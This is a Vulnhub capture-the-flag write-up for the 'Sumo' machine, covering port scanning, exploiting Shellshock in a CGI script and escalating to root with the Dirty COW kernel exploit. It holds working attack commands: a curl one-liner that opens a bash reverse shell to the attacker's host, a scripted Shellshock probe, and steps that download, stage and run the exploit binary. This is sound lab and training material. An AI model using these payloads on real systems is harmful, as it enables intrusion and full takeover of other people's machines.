[VLN] Sumo

Today we are going to hack the Vulnhub machine called Sumo. You can download it from the following link: Sumo

Enumeration


We start with an nmap scan to see which ports are open.

sml@Cassandra:~$ nmap -A -p- 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 12:18 CEST
Nmap scan report for ubuntu.home (192.168.1.104)
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
|   2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_  256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.88 seconds
Let's see if we can find anything on port 80. A first dirb run against the web root turned up the /cgi-bin directory, so we point dirb at that path to see what else is inside:

sml@Cassandra:~$ dirb http://192.168.1.104/cgi-bin /usr/share/wordlists/dirb/big.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------
START_TIME: Sat May 16 12:44:01 2020
URL_BASE: http://192.168.1.104/cgi-bin/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------

GENERATED WORDS: 20458
---- Scanning URL: http://192.168.1.104/cgi-bin/ ----
+ http://192.168.1.104/cgi-bin/test (CODE:200|SIZE:14)

---------------
END_TIME: Sat May 16 12:44:14 2020
DOWNLOADED: 20458 - FOUND: 1
We find /cgi-bin/test. A CGI script on a box running Apache 2.2.22 and OpenSSH 5.9p1 (Ubuntu 12.04-era packages) is a strong hint that bash predates the 2014 patches, so let's try Shellshock (CVE-2014-6271).
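Before throwing a reverse shell at the endpoint, it is worth confirming that the CGI really executes bash with a harmless canary; a 500 from Apache or a plain 200 without the canary tells you to look elsewhere. The following is an added example, not part of the original write-up: it assumes curl is installed and takes the target URL as its only argument.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): a non-destructive Shellshock
# (CVE-2014-6271) check against a CGI endpoint, to run before a reverse shell.
# Assumptions: curl is installed; the target URL is passed as $1.
set -u

# Header value that triggers the bug. The two "echo"s emit blank lines that end
# the CGI header block, so Apache returns our output in the body instead of a
# "malformed header from script" 500 error.
shellshock_header() {
    local canary="$1"
    printf '() { :; }; echo; echo; echo %s' "$canary"
}

# Success (0) only if the response body contains our canary.
classify_response() {
    local body="$1" canary="$2"
    case "$body" in
        *"$canary"*) return 0 ;;
        *)           return 1 ;;
    esac
}

# Send the probe in User-Agent (any header that mod_cgi exports as an
# environment variable works, e.g. Referer or Cookie) and report the verdict.
# Returns 0 = vulnerable, 1 = not vulnerable, 2 = request failed.
probe_cgi() {
    local url="$1" canary body
    canary="ss-$(date +%s)-$RANDOM"
    body="$(curl -s -m 10 -H "User-Agent: $(shellshock_header "$canary")" "$url")" || return 2
    if classify_response "$body" "$canary"; then
        echo "VULNERABLE: $url executed our header (canary $canary)"
        return 0
    fi
    echo "not vulnerable (or not a bash CGI): $url"
    return 1
}

# Usage: ./shellshock_probe.sh http://192.168.1.104/cgi-bin/test
if [ -n "${1:-}" ]; then
    probe_cgi "$1"
fi
```

The canary is random per run so a cached or static page cannot produce a false positive, and the probe only echoes a string, so it leaves nothing behind on the target. Once it reports VULNERABLE, swap the `echo` for the reverse shell used below.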

Exploitation


We set up our nc listener:

sml@Cassandra:~$ nc -nlvp 5555
And from another terminal we send the following:

sml@Cassandra:~$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.148/5555 0>&1'" http://192.168.1.104/cgi-bin/test
And we get the shell :)

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.104] 40918
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$
www-data@ubuntu:/usr/lib/cgi-bin$ python -c 'import pty; pty.spawn("/bin/sh")'

Privilege Escalation


Once inside, we see that the system runs a fairly old kernel, so we try the Dirty COW exploit (CVE-2016-5195): https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c We download and compile it on our own machine!

sml@Cassandra:~$ wget https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
--2020-05-17 15:48:15--  https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/71c902f55c09aa8ced351690e1e627363c231b45/c0w.c
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 151.101.132.133
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)[151.101.132.133]:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4368 (4.3K) [text/plain]
Saving to: 'c0w.c'

c0w.c                100%[======================>]   4.27K  --.-KB/s    in 0s

2020-05-17 15:48:16 (25.2 MB/s) - 'c0w.c' saved [4368/4368]

sml@Cassandra:~$ gcc -pthread c0w.c  -o c0w
c0w.c: In function ‘main’:
c0w.c:103:3: warning: implicit declaration of function ‘asprintf’; did you mean ‘vsprintf’? [-Wimplicit-function-declaration]
  103 |   asprintf(&backup, "cp %s /tmp/bak", suid_binary);
      |   ^~~~~~~~
      |   vsprintf
c0w.c:104:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
  104 |   system(backup);
      |   ^~~~~~
sml@Cassandra:~$ cp c0w /var/www/html
Once compiled, we put the binary on our web server so we can download it from the "victim" machine. The two implicit-declaration warnings come from includes missing in the gist (stdlib.h for system(), and stdio.h with _GNU_SOURCE for asprintf()); they are harmless here and the binary works.

www-data@ubuntu:/tmp$ wget http://192.168.1.148/c0w
wget http://192.168.1.148/c0w
--2020-05-17 06:48:48--  http://192.168.1.148/c0w
Connecting to 192.168.1.148:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17904 (17K) [application/octet-stream]
Saving to: `c0w'

     0K .......... .......                                    100%  424M=0s

2020-05-17 06:48:48 (424 MB/s) - `c0w' saved [17904/17904]
We make it executable and run it.

www-data@ubuntu:/tmp$ chmod +x c0w
$ ./c0w

                                
   (___)                                   
   (o o)_____/                             
    @@ `     \                            
     \ ____, //usr/bin/passwd                          
     //    //                              
    ^^    ^^                               
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 35d2c000

madvise 0

ptrace 0

$
Now we just have to run "passwd"... The exploit has overwritten the setuid-root /usr/bin/passwd with its own payload, so calling it drops us into a root shell; the original binary was saved to /tmp/bak.

$ /usr/bin/passwd
/usr/bin/passwd
root@ubuntu:/tmp# id
id
uid=0(root) gid=33(www-data) groups=0(root),33(www-data)
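The transfer steps above work, but two things bite in practice: a binary compiled on a current distro may refuse to start on a 2012-era target because of the glibc version, and a plain-HTTP copy gives no guarantee that what landed in /tmp is what was built. The following is an added example, not part of the original write-up: it wraps the same compile, stage, fetch and run flow with a static build, a hash check on the victim, and the cleanup step that puts /usr/bin/passwd back. It assumes c0w.c is already downloaded, python3 is available on the attacker, and the IP, port and paths are the write-up's.

```bash
#!/usr/bin/env bash
# Added example (not from the original write-up): build the Dirty COW PoC so it
# runs on an old target, stage it over HTTP, verify the copy on the victim, and
# put /usr/bin/passwd back afterwards.
# Assumptions: c0w.c is already downloaded; python3 is available on the attacker;
# the IP, port and paths below are the write-up's and are illustrative.
set -eu

# SHA-256 of a file (sha256sum exists on both the attacker and the target).
sha256_of() {
    sha256sum "$1" | cut -d' ' -f1
}

# Link statically so the binary does not depend on the attacker's newer glibc.
# A dynamic build made on a current distro can fail on the target with
# "version GLIBC_2.xx not found". Prints the hash to compare after transfer.
build_static() {
    local src="$1" out="$2"
    gcc -static -pthread -o "$out" "$src"
    sha256_of "$out"
}

# Attacker side: serve the staging directory over HTTP (Ctrl-C to stop).
stage_http() {
    local dir="$1" port="${2:-80}"
    (cd "$dir" && python3 -m http.server "$port")
}

# Compare a file's hash with the one computed on the attacker. Plain HTTP gives
# no integrity guarantee, and a truncated download would otherwise fail only
# when executed.
verify_hash() {
    local file="$1" expected="$2" actual
    actual="$(sha256_of "$file")"
    [ "$actual" = "$expected" ]
}

# Victim side: fetch, verify, make executable. Refuses to keep a bad copy.
fetch_and_verify() {
    local url="$1" expected="$2" dest="$3"
    wget -q -O "$dest" "$url"
    if ! verify_hash "$dest" "$expected"; then
        echo "hash mismatch for $dest; not executing" >&2
        rm -f "$dest"
        return 1
    fi
    chmod +x "$dest"
}

# After the root shell: the PoC overwrote /usr/bin/passwd and left the original
# at /tmp/bak. Restore it and its setuid bit so users can change passwords again.
restore_passwd() {
    cp /tmp/bak /usr/bin/passwd
    chmod 4755 /usr/bin/passwd
}

# Typical flow (run by hand, in order):
#   attacker: hash=$(build_static c0w.c /var/www/html/c0w); stage_http /var/www/html 80
#   victim:   fetch_and_verify http://192.168.1.148/c0w "$hash" /tmp/c0w && /tmp/c0w && /usr/bin/passwd
#   root:     restore_passwd
```

Static linking makes the binary a few hundred kilobytes instead of 17 KB, which is a fair trade for not having to guess the target's glibc. Restoring passwd matters even on a lab box: leaving a root shell behind at a path every user can execute is how a CTF machine becomes a shared backdoor.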

root.txt



root@ubuntu:/tmp# cd /root
root@ubuntu:/root# ls
root.txt
root@ubuntu:/root# cat root.txt
{Sum0-SunCSR-2020_r001}

End


And with that we are root on the machine :)